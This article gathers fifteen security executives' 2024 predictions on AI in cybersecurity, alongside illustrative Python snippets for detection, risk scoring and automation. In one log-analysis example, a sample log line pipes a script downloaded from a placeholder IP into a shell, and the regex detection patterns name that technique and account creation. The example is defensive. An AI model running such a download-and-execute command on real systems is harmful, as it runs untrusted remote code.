15 influencers predict that AI will be a game changer for cybersecurity in 2024


Will AI lead to mass job losses for cybersecurity personnel? What new threats and challenges does generative AI pose? Can cybersecurity "fight fire with fire" and benefit from AI technology itself?

With breakthrough advances in AI technology, attackers are accelerating their adoption of AI and combining it with social engineering techniques, making their attacks difficult for enterprises to prevent. At the same time, on the defensive side, AI is also the key to CISOs winning the AI arms race.

How will AI change the game for cybersecurity in 2024? VentureBeat recently interviewed 15 cybersecurity leaders from 13 companies to gather their expectations for 2024. Respondents generally agreed that the top goal for CISOs in 2024 is to build partnerships between security personnel and AI: AI needs human insight to realize its full potential in defending against cyberattacks. Here are the experts' key points:

Artificial intelligence brings improvements and challenges in detection capabilities

Peter Silva, Cyber Security Division, Ericom

AI's pattern-recognition capabilities can be used to improve detection (e.g., spotting new attack patterns, CVE vulnerabilities and attempts to exploit them, or even a Layer 3 DDoS attack that is providing cover for an otherwise unnoticed credential-stuffing attack). At the same time, AI will also make detection harder: detectors, for example, cannot yet distinguish human-written phishing attacks from AI-generated ones, which will drive the continued evolution of detection technology.
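As a rough, hypothetical illustration of the kind of pattern recognition Silva describes, the sketch below uses scikit-learn's IsolationForest to flag request sources whose behavior deviates from a learned baseline, which is one way a credential-stuffing burst might still stand out even while a volumetric DDoS is generating noise. The features, sample values, and contamination rate are illustrative assumptions, not any vendor's actual detection logic.

```python
# Minimal sketch: unsupervised anomaly detection over per-source login telemetry.
# Features, sample values, and the contamination rate are illustrative assumptions.
import numpy as np
from sklearn.ensemble import IsolationForest

# Each row: [requests_per_minute, distinct_usernames_tried, failed_login_ratio]
baseline = np.array([
    [12, 1, 0.05],
    [15, 2, 0.10],
    [10, 1, 0.00],
    [14, 1, 0.08],
    [11, 2, 0.07],
])

# Fit on normal traffic, then score new observations.
model = IsolationForest(contamination=0.1, random_state=42).fit(baseline)

new_traffic = np.array([
    [13, 1, 0.06],     # looks like the baseline
    [400, 350, 0.95],  # many usernames, mostly failures: credential-stuffing shape
])

for row, label in zip(new_traffic, model.predict(new_traffic)):
    print("ANOMALY" if label == -1 else "normal", row.tolist())
```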

Shadow AI and large-scale model deployment bring new data security risks

Elia Zaitsev, CTO of CrowdStrike

CrowdStrike expects that in 2024 attackers will turn their attention to AI systems as the newest threat vector, attacking targeted organizations through vulnerabilities in sanctioned AI deployments and through the blind spots created by employees' unsanctioned use of AI tools (shadow AI).

Security teams' understanding of AI threat models, and their monitoring of employee shadow AI, are still in the early stages, and these blind spots and new technologies open the door for threat actors eager to infiltrate corporate networks or access sensitive data. Employees who use new AI tools without security-team oversight create a new data-leakage risk for companies.

Over-reliance on AI can lead to a lack of oversight of security operations

Rob Gurzeev, CEO of CyCognito

Generative AI will have a positive impact on security, but it also carries a serious risk: it can make security teams complacent, which is dangerous. Over-reliance on AI can lead to a lack of oversight of an organization's security operations, which easily creates gaps in the attack surface. The idea that AI, once it becomes smart enough, can reduce the need for human insight is in fact a slippery slope.

AI can help companies improve their defense response speed

Howard Ting, CEO of Cyberhaven

Cyberhaven's survey data from earlier this year showed that 47% of employees have pasted confidential data into ChatGPT, and 11% of that data is sensitive. But things will eventually turn for the better: as large language models and generative AI mature, security teams will be able to use them to accelerate their defenses.

Generative AI improves the availability of security big data

John Morello, co-founder and CTO of Gutsy

Generative AI has tremendous potential to help security teams efficiently process massive amounts of incident data. Traditional approaches such as data lakes and SIEMs merely collect data and do little to make it easy to use; conversational AI can greatly improve the usability of that data.
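As a hedged sketch of what conversational access to incident data could look like, the snippet below compacts structured events into a plain-text context and builds a prompt for whatever language model a team already uses. The event schema and the ask_llm callable are hypothetical placeholders, not a specific product's API.

```python
# Minimal sketch: turning raw incident records into a prompt a language model can answer.
# The event schema and ask_llm are hypothetical placeholders, not a specific product API.
from typing import Callable

events = [
    {"time": "2024-01-30T09:14Z", "host": "web-01", "type": "failed_login", "count": 312},
    {"time": "2024-01-30T09:20Z", "host": "web-01", "type": "new_admin_account", "count": 1},
    {"time": "2024-01-30T09:25Z", "host": "db-02", "type": "large_egress", "count": 1},
]

def build_prompt(question: str, records: list) -> str:
    """Compact structured events into a text context the model can reason over."""
    context = "\n".join(
        f"- {r['time']} {r['host']} {r['type']} x{r['count']}" for r in records
    )
    return (
        "You are assisting a security analyst. Using only the events below, "
        f"answer the question.\n\nEvents:\n{context}\n\nQuestion: {question}"
    )

def answer(question: str, records: list, ask_llm: Callable[[str], str]) -> str:
    return ask_llm(build_prompt(question, records))

# Stub "model" that just reports prompt size, to keep the sketch self-contained.
print(answer("What happened on web-01 this morning?", events, lambda p: f"[{len(p)} chars sent to model]"))
```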

Generative AI lowers the barrier to entry for critical infrastructure attacks

Jason Urso, Chief Technology Officer, Honeywell Connected Enterprise

Critical infrastructure has always been a prime target for malicious actors. Previous successful attacks involved sophistication beyond the capabilities of the average hacker. However, generative AI lowers the barrier to entry, allowing less experienced hackers to generate malware, launch sophisticated phishing attacks to gain access to systems, and perform automated penetration testing.

As a result, the critical-infrastructure threat landscape is evolving toward AI-versus-AI defense.

On the defensive side of critical infrastructure, generative AI will be used as a closed-loop OT defense approach: dynamically changing security configurations and firewall rules as the threat landscape changes, and performing automated penetration testing to understand how risk is shifting.
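A minimal sketch of the closed-loop idea, assuming a simple mapping from the current number of active threat indicators to a firewall posture; the postures, ports, and rule strings are invented for illustration, and a real OT environment would route such changes through change control rather than applying them automatically.

```python
# Minimal sketch of closed-loop defense: pick a firewall posture from the current threat level.
# Postures, ports, and rule strings are illustrative assumptions, not OT vendor guidance;
# a real deployment would route changes through change control instead of auto-applying them.

POSTURES = {
    "baseline": {"allowed_ports": [443, 8443], "extra_denies": []},
    "elevated": {"allowed_ports": [443], "extra_denies": ["unrecognized external ASNs"]},
    "critical": {"allowed_ports": [], "extra_denies": ["all external sources"]},
}

def select_posture(active_indicators: int) -> str:
    """Map the number of currently active threat indicators to a posture name."""
    if active_indicators >= 10:
        return "critical"
    if active_indicators >= 3:
        return "elevated"
    return "baseline"

def render_rules(posture: str) -> list:
    """Render the chosen posture as human-reviewable rule strings."""
    cfg = POSTURES[posture]
    rules = [f"allow tcp dst-port {p}" for p in cfg["allowed_ports"]]
    rules += [f"deny src {d}" for d in cfg["extra_denies"]]
    rules.append("deny all (default)")
    return rules

for indicators in (1, 5, 12):
    posture = select_posture(indicators)
    print(indicators, "indicators ->", posture, render_rules(posture))
```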

AI doesn't mean cybersecurity talent will be out of work

Srinivas Mukkamala, Chief Product Officer, Ivanti

In 2024, many employees will be more worried about the impact of AI on their careers. For example, recent research found that nearly two-thirds of IT employees are concerned that AI will replace their jobs in the next five years. Business leaders need to be clear and transparent with their employees about how they plan to implement AI in order to retain talented employees – because reliable AI requires human oversight.

In addition, AI will generate more sophisticated social engineering attacks. In 2024, the increasing availability of AI tools will make social engineering attacks easier to mount. As companies become better at detecting traditional phishing emails, hackers are turning to new techniques to make phishing emails more credible. Misinformation created by bad actors using AI tools will also pose a real threat to organizations, governments, and society as a whole.

Generative AI will change the nature of work in cybersecurity roles

Merritt Baer, Field CISO at Lacework

Robots won't take over security jobs, but they will change the nature of cybersecurity work. Many security professionals already use AI to automate repetitive tasks, but what if it goes a step further? Imagine generative AI that not only prompts you to create an automation ("This is a request you've seen x times this week; do you want to automate it?") but can also produce what you need to do so (e.g., write a vulnerability mitigation or a patch). I expect the ultimate value of cybersecurity jobs to track what Ada Lovelace, the godmother of computer programming, foresaw: human creativity and innovative thinking are essential, while computers excel at reliable processing, deriving patterns from large data sets, and performing actions with mathematical accuracy.
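A small, hypothetical sketch of the "seen x times this week, automate it?" idea: normalize incoming requests into signatures, count them over the week, and surface anything frequent enough to be worth automating. The normalization rule and the threshold of five are illustrative assumptions.

```python
# Minimal sketch of the "seen x times this week, automate it?" prompt:
# count normalized request signatures and flag frequent ones as automation candidates.
# The normalization rule and the threshold of 5 are illustrative assumptions.
import re
from collections import Counter

requests_this_week = [
    "reset MFA for user alice",
    "reset MFA for user bob",
    "open firewall port 8443 for app-7",
    "reset MFA for user carol",
    "reset MFA for user dave",
    "reset MFA for user erin",
]

def signature(request: str) -> str:
    """Collapse identifiers so similar requests share one signature."""
    return re.sub(r"\b(user|app)[-\s]\S+", r"\1 <id>", request)

counts = Counter(signature(r) for r in requests_this_week)

for sig, n in counts.items():
    if n >= 5:
        print(f"Seen {n} times this week: '{sig}'. Do you want to automate it?")
```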

AI helps security teams keep up with development

Ankur Shah, Senior Vice President, Prisma Cloud, Palo Alto Networks

Today's security teams cannot keep up with the pace of application development, resulting in a myriad of security risks in production environments. And application development is only accelerating: more and more developers are using AI to write and ship new apps quickly, and AI will speed up application development by more than 10x in the near future. To level the playing field, enterprise security needs to turn to AI as well. Ultimately, AI is a data problem: if you don't have robust security data to train AI on, your ability to stop risks will lag.

Generative AI creates a versatile security analyst

Matt Kraning, CTO of Palo Alto Networks Cortex

Today, security analysts must be all-around unicorns, understanding not only how attackers compromise systems but also how to set up complex automations and queries to efficiently handle massive amounts of data. Generative AI will now make it much easier for security analysts to interact with that data.

Artificial intelligence is a key capability in detecting phishing emails

Christophe van de Weyer, CEO of Telesign

Fraudsters are using AI to scale up their attacks, for example by using AI-generated deepfake voices or writing styles to increase their success rates, which drove the number of phishing emails to a new all-time record in 2023. In 2024, consumers will find it increasingly hard to discern fraudulent emails and text messages, which will force businesses to tighten their defenses and focus more on account integrity, since phishing is typically used to take over accounts and carry out larger thefts. Businesses should use AI to risk-score logins and transactions based on continuous analysis of fraud signals, and cybersecurity firms should expand machine learning over those fraud signals to feed high-quality intelligence into email security programs.
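A hedged sketch of risk-scoring a login from a handful of fraud signals: the signals, hand-set weights, and decision threshold below are illustrative assumptions rather than Telesign's actual model, and in practice the weights would come from a model trained on labeled fraud data.

```python
# Minimal sketch: score a login from a few fraud signals using hand-set weights.
# Signals, weights, and the 0.5 threshold are illustrative assumptions, not a vendor's model.
import math

WEIGHTS = {
    "new_device": 1.2,
    "impossible_travel": 2.5,
    "recent_failed_attempts": 0.3,   # per failed attempt
    "disposable_email_domain": 1.8,
}

def login_risk(signals: dict) -> float:
    """Return a 0-1 risk score via a logistic squash of the weighted signals."""
    z = -3.0  # bias: most logins are legitimate
    for name, weight in WEIGHTS.items():
        z += weight * signals.get(name, 0)
    return 1 / (1 + math.exp(-z))

suspicious = {"new_device": 1, "impossible_travel": 1, "recent_failed_attempts": 6}
routine = {"recent_failed_attempts": 1}

for label, signals in [("suspicious", suspicious), ("routine", routine)]:
    score = login_risk(signals)
    action = "step-up verification" if score > 0.5 else "allow"
    print(label, round(score, 2), action)
```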

AI will solve the challenges of threat detection, classification, and response

Rob Robinson, Head of Telstra Purple EMEA

Today, the number of data points that cybersecurity professionals are responsible for monitoring and managing is staggering, and with the proliferation of the cloud and the intelligent edge this will only intensify in the coming years. AI technology is ideally suited to solving some of the security industry's hardest problems in threat detection, classification, and response. In 2024, we will therefore see AI once again transform the skill set CISOs need.

Generative AI will increase the level of automation of security operations across the board

Vineet Arora, CTO of WinWire

Generative AI will dramatically enhance cybersecurity operations management. AI will enable more automation in security workflows that are currently managed by humans, such as threat intelligence, security hardening, penetration testing, and detection engineering. Many routine tasks, such as log analysis, incident response, and security patching, can be automated with generative AI, freeing up valuable time for security analysts to focus on more complex cybersecurity problems. At the same time, attackers are using generative AI to create highly realistic scenarios for social engineering attacks, malware cloaking, and sophisticated phishing campaigns.
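A minimal sketch of automating the first pass of log analysis, assuming a regex pre-filter that surfaces suspicious lines and extracts simple indicators before anything is handed to a generative model or an analyst; the patterns below are illustrative, not a complete detection ruleset.

```python
# Minimal sketch: regex pre-filter for suspicious log lines plus simple indicator extraction,
# so only candidate lines need to go to a generative model or an analyst.
# The patterns are illustrative assumptions, not a complete detection ruleset.
import re

SUSPICIOUS = [
    re.compile(r"failed password", re.IGNORECASE),
    re.compile(r"\bcurl\b.*\|\s*(ba)?sh"),               # download piped straight into a shell
    re.compile(r"useradd|net\s+user\s+\S+\s+/add", re.IGNORECASE),
]
IP = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")

logs = [
    "Jan 30 09:14:02 web-01 sshd: Failed password for root from 203.0.113.7",
    "Jan 30 09:15:10 web-01 cron: backup completed",
    "Jan 30 09:20:44 web-01 bash: curl http://198.51.100.9/x.sh | sh",
]

for line in logs:
    if any(p.search(line) for p in SUSPICIOUS):
        print("candidate:", line)
        print("  indicators:", IP.findall(line))
```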

Generative AI dramatically improves compliance efficiency

Claudionor Coelho, Chief Artificial Intelligence Officer, Zscaler, and Sanjay Kalra, Vice President of Product Management

Generative AI will have a significant and far-reaching impact on compliance in 2024. Historically, compliance has been a time-consuming endeavor that includes developing policies, enforcing restrictions, gathering evidence, and answering customer questions. These tasks are mostly text- and process-oriented, and generative AI will greatly increase how much of them can be automated.
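As a hedged sketch of the evidence-gathering step, the snippet below scores stored policy snippets against a customer's compliance question by keyword overlap and selects the best matches to put in front of a generative model or an auditor; the snippets and the crude scoring are illustrative assumptions.

```python
# Minimal sketch of the evidence-gathering step: rank stored policy snippets against a
# customer question by keyword overlap, then pass the top matches on to a model or auditor.
# The snippets and the crude scoring are illustrative assumptions.

policy_snippets = [
    "Access to production data requires MFA and is reviewed quarterly.",
    "Backups are encrypted at rest with AES-256 and tested monthly.",
    "All vendor contracts include a data processing agreement.",
]

def score(question: str, snippet: str) -> int:
    """Count shared lowercase words as a crude relevance signal."""
    return len(set(question.lower().split()) & set(snippet.lower().split()))

question = "How is access to production data controlled and reviewed?"
ranked = sorted(policy_snippets, key=lambda s: score(question, s), reverse=True)

print("Evidence to include in the answer:")
for snippet in ranked[:2]:
    print("-", snippet)
```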
